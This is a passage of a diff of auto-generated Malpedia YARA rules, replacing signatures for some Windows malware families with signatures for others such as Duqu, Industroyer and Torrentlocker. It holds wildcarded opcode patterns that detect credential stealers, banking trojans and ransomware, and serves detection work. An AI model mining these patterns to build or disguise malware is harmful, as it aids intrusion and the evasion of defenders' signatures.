"1aacad185595691b5a0f903be6e5a023d3d5227283438abf4c811f89adcac931" score = 75 quality = 75 tags = "FILE" @@ -166121,32 +168936,32 @@ rule MALPEDIA_Win_Doublefinger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4533c0 8b942458010000 488b4c2450 e8???????? 48898424c8020000 4533c0 8b94245c010000 } - $sequence_1 = { 89442428 8b442424 ffc8 89442424 } - $sequence_2 = { eb4b 4c8d057b820000 baeb030000 ff15???????? eb37 488d542420 ff15???????? } - $sequence_3 = { 0000 006689 442432 b845000000 6689442434 b84d000000 6689442436 } - $sequence_4 = { 894c2408 4883ec18 488d442420 4889442408 } - $sequence_5 = { 48898424c8010000 c744245c00000000 486344245c 488b8c24d0000000 } - $sequence_6 = { 4889442450 4533c0 8b9424c0010000 488b4c2450 e8???????? 48898424e8020000 } - $sequence_7 = { 33d2 488d41ff 4883f8fd 773c b84d5a0000 663901 } - $sequence_8 = { 488b00 ba01000000 488b4c2438 ff90b8000000 } - $sequence_9 = { ff9424c0000000 4889842480010000 b875000000 6689842400010000 b872000000 6689842402010000 } + $sequence_0 = { 8b1d???????? 8d8c24a4010000 6a00 6a00 6a03 6a00 } + $sequence_1 = { 5b 81c400010000 c3 8b8c2410010000 51 57 } + $sequence_2 = { ffd7 56 53 8d4c2414 6a08 51 e8???????? } + $sequence_3 = { ffd7 85c0 753c 8b35???????? ffd6 83f802 742f } + $sequence_4 = { 7554 33f6 89b5dcfeffff 8b3d???????? 83fe05 7332 } + $sequence_5 = { 81ec80090000 53 56 57 68???????? e8???????? } + $sequence_6 = { 68???????? e8???????? 83c408 8d9424a8020000 } + $sequence_7 = { 56 57 ff15???????? 85c0 7514 8d442414 } + $sequence_8 = { c7442400ffffffff 50 c7442408ffffffff e8???????? 83c404 8d4c2400 } + $sequence_9 = { 8b3d???????? 83c408 8d442408 50 ffd7 } condition: - 7 of them and filesize <115712 + 7 of them and filesize <1143808 } -rule MALPEDIA_Win_Lokipws_Auto : FILE +rule MALPEDIA_Win_Torrentlocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "51c802c9-41e6-5018-92e7-bd3c468d0c8a" + id = "56bf47db-a6d1-5792-b5b6-3656138ac949" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lokipws_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.torrentlocker_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "c67ee200474ecbc3881960b10110e8aa7bde902411981013b30687544f7cfcf3" + logic_hash = "9124185b3dba8eb6288bd309dcd17a816c52adb0e1e08ff17bcd23b3d53099e4" score = 75 quality = 75 tags = "FILE" @@ -166160,32 +168975,38 @@ rule MALPEDIA_Win_Lokipws_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 83ec1c 6a2a 58 6a4d 668945e4 } - $sequence_1 = { 53 57 a3???????? e8???????? 68???????? 56 } - $sequence_2 = { 50 688b778dfe 50 e8???????? 8d4df8 } - $sequence_3 = { 6a00 ff75fc ff35???????? e8???????? 6a00 6a00 } - $sequence_4 = { 56 ff750c e8???????? 83c40c 85c0 7420 90 } - $sequence_5 = { 50 ff7508 8975fc e8???????? 8bf8 59 59 } - $sequence_6 = { 58 66895dc4 668975ca 66897dcc 66895dce 668955d0 66895dd2 } - $sequence_7 = { 6a02 e8???????? ff750c ff7508 ffd0 5d c3 } - $sequence_8 = { 668945f2 58 6a6e 668945f6 58 668945fa 33c0 } - $sequence_9 = { 83fe05 6a02 58 0f47f0 33db 43 3bf3 } + $sequence_0 = { c3 83f801 7405 83f802 } + $sequence_1 = { 8b0d???????? 5f c7000c000000 894804 } + $sequence_2 = { 85c0 7514 e8???????? 3d00000600 } + $sequence_3 = { 50 56 6a00 6a01 6a02 ff15???????? } + $sequence_4 = { 8b0d???????? 890e e8???????? 8bd8 e8???????? 6a00 6a01 } + $sequence_5 = { 83ec24 6a00 6a01 68???????? ff15???????? 85c0 7551 } + $sequence_6 = { 56 ff15???????? 83f802 740f 83f803 740a } + $sequence_7 = { e8???????? 3d00000600 1bc0 40 a3???????? eb05 } + $sequence_8 = { 83c002 6685c9 75f5 2bc2 d1f8 8d440014 } + $sequence_9 = { 52 50 ff15???????? 85c0 7519 8b0d???????? 51 } + $sequence_10 = { 51 6a01 6a00 0d00800000 50 6a00 } + $sequence_11 = { 8b0d???????? 5f 894e0c 5e } + $sequence_12 = { 8b0d???????? 6a00 6a00 57 } + $sequence_13 = { 48 85c0 7ff4 5f 33c0 5e c3 } + $sequence_14 = { 8b0d???????? 57 6a00 51 ff15???????? 8bc6 } + $sequence_15 = { c705????????00000000 e8???????? 8bf0 e8???????? } condition: - 7 of them and filesize <1327104 + 7 of them and filesize <933888 } -rule MALPEDIA_Win_Oddjob_Auto : FILE +rule MALPEDIA_Win_Duqu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "05ff5b48-0b07-5c37-b3fa-78979fc46d1b" + id = "4f983d2e-8e54-5fa3-99e8-f35467f58ba0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oddjob_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.duqu_auto.yar#L1-L157" license_url = "N/A" - logic_hash = "cba635f9b22031c02deb6504fbb70476906689529cb50c775ead5481738df2df" + logic_hash = "c9f95c9fbccbdcbcab2eb713244b96d59984c1db33c0129682f88201221bf820" score = 75 quality = 75 tags = "FILE" @@ -166199,32 +169020,38 @@ rule MALPEDIA_Win_Oddjob_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 59 8d9530ffffff 6a01 8bcb 8bc2 } - $sequence_1 = { c68552fbffff43 c68553fbffff5e c68554fbffff5b c68555fbffff8b c68556fbffff4b } - $sequence_2 = { 663d3600 751f 66837f0234 7518 } - $sequence_3 = { 50 bf???????? 57 6a04 53 68???????? ffd6 } - $sequence_4 = { 8bc3 4b 85c0 0f8498000000 0fb7c1 83f841 7c05 } - $sequence_5 = { c68596faffff24 c68597faffff08 c68598faffff8b c68599faffff43 } - $sequence_6 = { c685f8f9ffff40 c685f9f9ffff68 889dfaf9ffff c685fbf9ffff10 889dfcf9ffff 889dfdf9ffff c685fef9ffff51 } - $sequence_7 = { 889d12f8ffff 889d13f8ffff 889d14f8ffff 889d15f8ffff 889d16f8ffff 889d17f8ffff 889d18f8ffff } - $sequence_8 = { 85c0 7503 897dfc 397de8 7409 ff75e8 ff15???????? } - $sequence_9 = { 53 68???????? ffd6 85c0 741c 8d85a094ffff } + $sequence_0 = { 8bcb e8???????? bacdc185ad 89464c } + $sequence_1 = { 85f6 7eb3 b8c64ff867 8bde 8bd7 89442420 } + $sequence_2 = { 8b5c2414 85db 0f8402ffffff 46 } + $sequence_3 = { 85c0 0f848b020000 ba10ee27d3 8bcf e8???????? 894624 85c0 } + $sequence_4 = { 0f84f7000000 0fb706 b9ab4f5ecd 33c1 } + $sequence_5 = { 56 51 8bf2 e8???????? } + $sequence_6 = { 83c120 0fb7c9 8bc1 0fafc9 83e007 } + $sequence_7 = { 85c0 7465 e8???????? 85c0 } + $sequence_8 = { 55 8bec 81ec08020000 56 8bf2 8d95f8fdffff } + $sequence_9 = { 8bcb e8???????? bafa67937e 894648 8bcf } + $sequence_10 = { 8bf2 57 8d8e14020000 e8???????? } + $sequence_11 = { 8bf2 57 8d4e4c e8???????? } + $sequence_12 = { 8bf2 8bf9 ff15???????? 56 } + $sequence_13 = { 8bf2 57 8d8ecc000000 e8???????? } + $sequence_14 = { 8bf2 57 8d8e0c020000 e8???????? } + $sequence_15 = { 8bf2 57 8bf9 85f6 7425 66833e00 } condition: - 7 of them and filesize <221184 + 7 of them and filesize <18759680 } -rule MALPEDIA_Win_Mydogs_Auto : FILE +rule MALPEDIA_Win_Goopic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8e0c4ca1-c33b-55e0-bdee-122873680dc3" + id = "af6daaef-2e7b-547b-a95b-f4526c03929f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mydogs_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.goopic_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "64d7e86bc2c7d2208d4e1b71baa972c2ebb11908509ae447cb6fe3a57912500e" + logic_hash = "09cf2d520274006f21b8dfb7e13c7364d612efefae1767684cd3f4a4dac575b5" score = 75 quality = 75 tags = "FILE" @@ -166238,32 +169065,32 @@ rule MALPEDIA_Win_Mydogs_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3db7000000 0f8444010000 68???????? 6804010000 68???????? e8???????? } - $sequence_1 = { 884df3 c1fa18 8b5364 8bc2 8bce 0facc108 c1f808 } - $sequence_2 = { 5d e9???????? 6a18 68???????? e8???????? 8b4508 8bd8 } - $sequence_3 = { 894e64 8b4dec 894650 894658 894660 8b45ee 8d49c4 } - $sequence_4 = { 50 ffb5e4eeffff ffb5f8eeffff ff15???????? 85c0 7515 5f } - $sequence_5 = { 8bf9 53 895ddc 897de0 e8???????? } - $sequence_6 = { 8b4dfc 33cd e8???????? 8be5 5d c3 8d85f4eeffff } - $sequence_7 = { 50 8bcf c645ff4b e8???????? 6a01 8d450b 50 } - $sequence_8 = { 1ddeb19d01 50 51 89530c e8???????? 894310 } - $sequence_9 = { e8???????? 50 6800080000 53 89442434 e8???????? 83c414 } + $sequence_0 = { 8d85fcf7ffff 50 ff15???????? 6a00 6a00 6a00 6a00 } + $sequence_1 = { 57 ff742428 ff15???????? 85c0 740d } + $sequence_2 = { c785d0fdffff2c020000 ff15???????? 8bf0 8d85d0fdffff 50 56 } + $sequence_3 = { 50 8b08 ff11 8b442414 50 } + $sequence_4 = { ff15???????? 8bd7 8d8df8bfffff e8???????? 57 68???????? ff15???????? } + $sequence_5 = { 8bfa ffd6 8bd8 895dfc } + $sequence_6 = { 50 6aff 68???????? 6a00 6a00 ffd7 8d842448190000 } + $sequence_7 = { 0f8664ffffff 8b4dfc 33c0 5f 5e 33cd 5b } + $sequence_8 = { 53 ff15???????? 8bf8 85ff 0f84f4000000 56 6a00 } + $sequence_9 = { c785c0fdffff305d4000 eb0a c785c0fdffff245d4000 8d85b4fdffff c785c4fdffff3c5d4000 50 } condition: - 7 of them and filesize <313344 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Stration_Auto : FILE +rule MALPEDIA_Win_Matrix_Banker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b1ff0234-14a0-5584-b678-4973125b246b" + id = "5e463068-e12b-5f8d-ab9f-c81457da2c25" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stration_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matrix_banker_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "1e976189a59a2a64efd8d3bfcb5fabcc1cb05f5b8a248de2fec831e10609d819" + logic_hash = "8e0666cd40465e0b5fba82c6d7538e5812414aad17fe7eeb1cf9c0a79b729bb8" score = 75 quality = 75 tags = "FILE" @@ -166277,32 +169104,32 @@ rule MALPEDIA_Win_Stration_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6a01 baf1000000 8bcb e8???????? 55 6a01 } - $sequence_1 = { 56 e8???????? 83c408 6a00 6a01 baf1000000 8bcd } - $sequence_2 = { e8???????? 680b040000 56 8944241c } - $sequence_3 = { c1fa05 891424 8bd1 52 e8???????? a3???????? 8b4c241c } - $sequence_4 = { ba11010000 8bce e8???????? c705????????00000000 } - $sequence_5 = { 8b15???????? 89442404 a1???????? 894c2408 8a0d???????? 89442410 8954240c } - $sequence_6 = { 33f6 85ff 893d???????? 7517 a1???????? 85c0 c605????????00 } - $sequence_7 = { 8a540404 c1e910 32d1 88540404 } - $sequence_8 = { 83f80d 7cec 8b15???????? a1???????? 8b0d???????? 891424 668b15???????? } - $sequence_9 = { eb05 bd14000000 660935???????? 8d542434 52 8d8424b4000000 } + $sequence_0 = { eb0b 8d4abf 80f905 7703 } + $sequence_1 = { 8d489f 80f905 7704 04a9 eb0a 8d48bf } + $sequence_2 = { 8d4a9f 80f905 7705 80c2a9 eb0b } + $sequence_3 = { 7705 80c2a9 eb0b 8d4abf 80f905 7703 80c2c9 } + $sequence_4 = { 80f905 7702 04c9 8d4ad0 } + $sequence_5 = { 80c2a9 eb0b 8d4abf 80f905 7703 80c2c9 } + $sequence_6 = { ff15???????? e8???????? 85c0 740a e8???????? 83f8ff } + $sequence_7 = { eb18 8d4a9f 80f905 7705 80c2a9 } + $sequence_8 = { eb18 8d4a9f 80f905 7705 } + $sequence_9 = { 8d489f 80f905 7704 04a9 eb0a 8d48bf 80f905 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <422912 } -rule MALPEDIA_Win_Krbanker_Auto : FILE +rule MALPEDIA_Win_Nimrev_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "236e4eb3-f9a9-5a5c-939d-2dd344c94ac6" + id = "62b602c2-9378-5d4d-8f76-ba10a1fe3c95" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.krbanker_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimrev" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimrev_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "d1369d0e33548d319048c3c036e2e47c22a922a80b7ada061139a11ddd9f8b91" + logic_hash = "276c930d9217520c07d5dbe59ac126b04c22edd3ab1aa62095745bbe5305f85e" score = 75 quality = 75 tags = "FILE" @@ -166316,34 +169143,34 @@ rule MALPEDIA_Win_Krbanker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c404 58 8945dc 837ddc00 } - $sequence_1 = { 83c404 58 8945fc b8???????? 50 } - $sequence_2 = { 6801000000 bb40010000 e8???????? 83c410 8945c8 6801010080 6a00 } - $sequence_3 = { 0faf03 ebf5 8bc8 c3 55 8bec 83c4f4 } - $sequence_4 = { 75a4 dd442410 e8???????? 8ad8 } - $sequence_5 = { 7762 7415 3d04000080 7417 3d01010080 } - $sequence_6 = { bb40010000 e8???????? 83c410 8945cc ff75cc ff75d0 } - $sequence_7 = { 8a5c2410 8ac3 5e 5b c3 8b542410 83ec0c } - $sequence_8 = { 8b5dfc 83c304 895df8 8965f4 ff7514 } - $sequence_9 = { 03d8 895dd4 8b5df8 e8???????? } + $sequence_0 = { ffd0 90 e9???????? 90 b9d0070000 e8???????? } + $sequence_1 = { c1e002 01d0 01c0 29c1 89c8 83c030 89c1 } + $sequence_2 = { b801000000 eb05 b800000000 8845f7 eb01 90 } + $sequence_3 = { b801000000 eb05 b800000000 8845f7 eb01 90 0fb645f7 } + $sequence_4 = { eb05 b800000000 8845f7 eb01 90 } + $sequence_5 = { 83f001 84c0 7408 90 } + $sequence_6 = { 0fb600 3c7d 7407 b801000000 eb05 } + $sequence_7 = { 89c1 e8???????? eb04 90 eb01 90 } + $sequence_8 = { 3c7d 7407 b801000000 eb05 } + $sequence_9 = { eb01 90 0fb645f6 8845f7 } condition: - 7 of them and filesize <1826816 + 7 of them and filesize <1141760 } -rule MALPEDIA_Win_Bandit_Auto : FILE +rule MALPEDIA_Win_Industroyer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4242f486-f361-5c1c-837c-874b9d2592eb" + id = "9c6bfb9f-c466-5000-a18a-b1782556f295" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bandit_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.industroyer_auto.yar#L1-L379" license_url = "N/A" - logic_hash = "e59306c04a92c7c36290cce1b84004757d2fea7b6a860dd6621dd5fc2300ad60" + logic_hash = "10be42e3e137c59c80c36fac63f4d878185befa45cbf0b3714b0e9925e862e84" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -166355,32 +169182,62 @@ rule MALPEDIA_Win_Bandit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 488d0d9ca6a100 48894820 833d????????00 750b 488b4c2478 48894828 } - $sequence_1 = { c3 4889d0 e8???????? 84c0 744e 488b4c2428 488b11 } - $sequence_2 = { 83c301 4883c604 4501f1 e8???????? 4139df 75d6 8b742460 } - $sequence_3 = { e9???????? 488d5f01 4839da 731d 4889f0 4889d1 bf01000000 } - $sequence_4 = { e8???????? 48c7401801000000 488d0d1c9c5e00 48894810 4889c3 488d0530636a00 488b6c2440 } - $sequence_5 = { ffd2 4889442438 48895c2440 48894c2448 48897c2450 90 488b7c2430 } - $sequence_6 = { c644242701 488b4210 488b5c2428 488b4c2430 488b7c2438 6690 e8???????? } - $sequence_7 = { 8894249d000000 0fb654246c 4129d7 4488bc249e000000 0fb6542474 440fb6442425 4429c2 } - $sequence_8 = { e8???????? 4889d7 c60700 488d050e9a6b00 e8???????? 488b4c2438 488b542448 } - $sequence_9 = { c604085c 49f7d9 49c1f93f 4c8d5101 4d21ca 4e8d0c10 48f7df } + $sequence_0 = { 50 50 ff750c ff15???????? 8d45fc 50 8d45f8 } + $sequence_1 = { 68f4010000 ff15???????? 33c0 50 } + $sequence_2 = { 50 8945e0 e8???????? 8945f8 e8???????? 50 8945e4 } + $sequence_3 = { 6808020000 50 ff7710 ff15???????? } + $sequence_4 = { ff7710 6a03 56 e8???????? 83c424 894708 85c0 } + $sequence_5 = { ff15???????? 8bd8 8d8598fdffff 6804010000 50 68???????? ff15???????? } + $sequence_6 = { 6a02 50 53 68000000c0 56 c745f40c000000 895dfc } + $sequence_7 = { 6a4c e8???????? 8bf0 8d8510ffffff 6a4c } + $sequence_8 = { 8bf9 ff15???????? 3bf8 0f84bb000000 } + $sequence_9 = { 8b7508 ff7604 8b06 ffd0 56 e8???????? } + $sequence_10 = { ffd6 85c0 7431 ff35???????? } + $sequence_11 = { 8bd8 85db 0f849d000000 8d85d0fdffff c785d0fdffff2c020000 50 53 } + $sequence_12 = { 683f010f00 6a00 8d85a0f3ffff 50 6802000080 ff15???????? 85c0 } + $sequence_13 = { 85c0 0f85bb000000 6800020000 8d85a0fbffff 50 } + $sequence_14 = { bfffff0000 0f46f9 3d00005000 b900400000 } + $sequence_15 = { 8d8c2468020000 e8???????? 8d442418 50 ff742414 ff15???????? } + $sequence_16 = { eb07 8b0cc5dc084100 894de4 85c9 } + $sequence_17 = { 0f8501010000 c745e0e4ff4000 8b4508 8bcf } + $sequence_18 = { 6a0a 8854382a 8b048dd01f0210 8874382b 8b048dd01f0210 5a } + $sequence_19 = { 0f8580000000 8b4508 dd00 ebc6 c745e0e8ff4000 } + $sequence_20 = { 6689823e020000 0fb68340020000 888240020000 8d8344020000 50 e8???????? } + $sequence_21 = { 50 ff15???????? 6a02 ff15???????? 50 ffd6 ff770c } + $sequence_22 = { 0fb605???????? 88413e 0f1005???????? 0f118133010000 a1???????? 898143010000 } + $sequence_23 = { 83e901 740d 83e902 7521 } + $sequence_24 = { 660f28b820004100 660f54f0 660f5cc6 660f59f4 660f5cf2 f20f58fe } + $sequence_25 = { 807b0100 0f85fc000000 a840 0f85d5000000 ff35???????? ff15???????? } + $sequence_26 = { 89422c 0fb64330 884230 0fb64331 884231 0fb64332 } + $sequence_27 = { 746a ff7508 8b15???????? 51 8bcb e8???????? } + $sequence_28 = { 85c0 7450 6aff 56 ff15???????? } + $sequence_29 = { ba???????? 0f94c1 884b32 84c9 a1???????? f30f7e05???????? } + $sequence_30 = { 8b442418 89442440 8d44243c 50 ff15???????? 50 } + $sequence_31 = { ff15???????? 68???????? ff15???????? 85c0 7417 68???????? } + $sequence_32 = { 83c410 84c0 0f84b9010000 8b8520ffffff 8bbd1cffffff 2bc7 } + $sequence_33 = { 8d4dc8 ff30 e8???????? 8d4d84 83ff02 0f86a4000000 } + $sequence_34 = { e8???????? 6a00 56 8d8d08feffff e8???????? } + $sequence_35 = { 8bce 8907 53 894704 e8???????? 8b4308 } + $sequence_36 = { 53 8b1c85205e4400 56 6800080000 } + $sequence_37 = { 8945e4 8d83bc000000 50 e8???????? 6a28 e8???????? } + $sequence_38 = { 0fb7c1 8945f8 3905???????? 7f26 663b4df4 7320 } + $sequence_39 = { 33c5 8945fc 8365e000 53 8b5d0c 56 } condition: - 7 of them and filesize <29914112 + 7 of them and filesize <983040 } -rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE +rule MALPEDIA_Win_Bravonc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "af26c213-66d2-5675-81ab-6f59f34ddb98" + id = "e1447c3c-8c4c-54e5-9d2c-b00b52d2dc03" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_ugx_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bravonc_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "c0369798dbc9b5bf726746a205f3377c225f0e99dd41f08ae5697ccf08cc0c9d" + logic_hash = "76468ca1f8266a49d1bb0da33f680bf0a2046353d9d66d58507a76281c00d1b6" score = 75 quality = 75 tags = "FILE" @@ -166394,32 +169251,32 @@ rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d458c 895dec 50 8d8568ffffff 50 } - $sequence_1 = { 59 745e 8d4640 50 ff750c ffd3 59 } - $sequence_2 = { 50 ff15???????? 85c0 7455 8d85a8feffff 53 50 } - $sequence_3 = { ff9698060000 8bf8 85ff 0f84b5000000 8d866e0c0000 50 57 } - $sequence_4 = { 8d85a8feffff 68???????? 50 ffd6 } - $sequence_5 = { 50 ff55fc 8bc3 eb48 ff15???????? 56 } - $sequence_6 = { 8d8584fdffff 50 ff55bc 50 8d8584fdffff 50 } - $sequence_7 = { 8d8584f9ffff 57 50 ff55f0 } - $sequence_8 = { ff5508 ff7510 e9???????? 53 } - $sequence_9 = { 8d85a8feffff 68???????? 50 ffd6 8d85a8feffff 68???????? 50 } + $sequence_0 = { 0f8c05040000 8b06 3b7804 0f8dfa030000 395e04 7407 50 } + $sequence_1 = { 5b c3 55 8bec 53 33db 395d0c } + $sequence_2 = { 57 ff75ec 334dec 030a 034df0 8d8401d6c162ca 8945f0 } + $sequence_3 = { 8907 8b45f4 2bfb 59 59 8907 8b45fc } + $sequence_4 = { 83c430 8bce 53 56 e8???????? 5f 5e } + $sequence_5 = { e8???????? 8b0e 030f c1e104 2bc1 eb08 8d4de0 } + $sequence_6 = { ff75f0 e8???????? 8b4df8 83c440 334dec 57 } + $sequence_7 = { 335dfc 3175fc 83c118 ff4df0 8bf2 8b55fc 8955f8 } + $sequence_8 = { 83450c08 ebd2 d36d08 8b0c8590b24000 234d08 014df0 8bc8 } + $sequence_9 = { 03f3 2bfb 03f3 890f } condition: - 7 of them and filesize <57344 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Orchard_Auto : FILE +rule MALPEDIA_Win_Mirage_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "68833672-b2e1-5b37-9ae2-2dac96bba231" + id = "1bf63709-182f-50be-a8ab-e40f87c0e4e9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orchard_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mirage_auto.yar#L1-L173" license_url = "N/A" - logic_hash = "70c3ab090316ecb85f40208f530bb1fb9e1727e271d34e7cabe8cdcf998bd59f" + logic_hash = "dc6fe884f3e04eb4b8ba5e715519d9f15ffa67807a8e3bc171df65981afb64ab" score = 75 quality = 75 tags = "FILE" @@ -166433,38 +169290,38 @@ rule MALPEDIA_Win_Orchard_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c404 e8???????? 99 b95b000000 f7f9 } - $sequence_1 = { 6a01 c645fc08 e8???????? 894604 83c404 8d4718 897034 } - $sequence_2 = { 56 ff15???????? ff15???????? 50 6a00 } - $sequence_3 = { 8b8550fdffff 83e001 0f8412000000 83a550fdfffffe } - $sequence_4 = { 8a45ef 884740 7510 8b470c 8bcf 6a00 } - $sequence_5 = { 8d442410 50 ff15???????? 6685c0 } - $sequence_6 = { 8b5de8 894348 8b5de0 c70600000000 } - $sequence_7 = { 8b75a8 46 56 e8???????? } - $sequence_8 = { 8b54240c 83d200 03c1 8b4c2420 } - $sequence_9 = { f7f9 81c2d0070000 52 ffd6 } - $sequence_10 = { 8b10 8bc8 6a01 ff12 837f3800 8a45ef } - $sequence_11 = { 8b07 6a08 895de0 8b4004 } - $sequence_12 = { 83f81f 0f877e030000 52 51 e8???????? } - $sequence_13 = { 8b7c2424 89542428 8b54240c 83d200 } - $sequence_14 = { 50 ff15???????? 83f805 7507 } - $sequence_15 = { 8bc8 83e01f c1f905 8b0c8d00755d00 c1e006 8d44010c 50 } + $sequence_0 = { 6801000080 ff15???????? 85c0 7556 } + $sequence_1 = { 50 6a01 6a06 c645ff01 } + $sequence_2 = { a0???????? 8d8d90feffff ff35???????? 50 ff75ec ff75e8 e8???????? } + $sequence_3 = { 50 8d857cfdffff 50 e8???????? 59 59 8d8580feffff } + $sequence_4 = { 3b4510 894514 731f 6802800000 8d8520010000 53 } + $sequence_5 = { ff7518 e8???????? 83c41c 85ff 7613 8b4518 57 } + $sequence_6 = { 50 53 68???????? c745f804010000 ff75fc ff15???????? } + $sequence_7 = { 395df4 0f85b1000000 3bf3 0f85a9000000 381f } + $sequence_8 = { ff7518 03fb e8???????? 33db 59 } + $sequence_9 = { 57 8b7d18 8bf1 8d5f19 88461c 53 e8???????? } + $sequence_10 = { e8???????? 50 8d8520f9ffff e9???????? } + $sequence_11 = { 85c0 5e 7507 8b45f8 } + $sequence_12 = { 50 8b08 ff517c 8b06 8d55f4 52 50 } + $sequence_13 = { e8???????? 8d45e4 56 83c704 } + $sequence_14 = { ff15???????? 8d85f4f0ffff 53 50 68???????? 56 e8???????? } + $sequence_15 = { 56 50 e8???????? 83c414 e9???????? ff75f0 e8???????? } condition: - 7 of them and filesize <4716352 + 7 of them and filesize <1695744 } -rule MALPEDIA_Win_Neteagle_Auto : FILE +rule MALPEDIA_Win_Neddnloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1db1653f-5505-5d3a-ba38-0bc41fb6ed7f" + id = "8eecbeb9-33c7-5f00-852d-691f303c8b89" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neteagle_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neddnloader_auto.yar#L1-L169" license_url = 